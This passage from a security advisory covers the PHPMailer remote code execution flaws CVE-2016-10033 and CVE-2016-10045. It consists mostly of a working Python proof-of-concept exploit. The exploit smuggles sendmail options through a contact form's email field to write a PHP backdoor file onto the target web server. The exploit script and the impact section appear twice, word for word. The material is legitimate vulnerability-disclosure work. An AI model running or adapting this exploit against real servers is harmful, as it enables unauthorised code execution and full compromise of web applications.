V. PROOF OF CONCEPT EXPLOIT
-------------------------
#!/usr/bin/python
#PHPMailer_RCE_exploit.pl
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories...ode-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib
import urllib2
import socket
import sys
RW_DIR = "/var/www/html/uploads"
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
~~~~~~~~~~~
The researcher also developed an Unauthenticated RCE exploit for a popular
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has
fixed the vulnerabilities.
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
VI. BUSINESS IMPACT
-------------------------
A successful exploitation could let remote attackers to gain access to
the target server in the context of the web server account which could
lead to a full compromise of the web application.
-------------------------
#!/usr/bin/python
#PHPMailer_RCE_exploit.pl
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories...ode-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib
import urllib2
import socket
import sys
RW_DIR = "/var/www/html/uploads"
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
~~~~~~~~~~~
The researcher also developed an Unauthenticated RCE exploit for a popular
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has
fixed the vulnerabilities.
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
VI. BUSINESS IMPACT
-------------------------
A successful exploitation could let remote attackers to gain access to
the target server in the context of the web server account which could
lead to a full compromise of the web application.
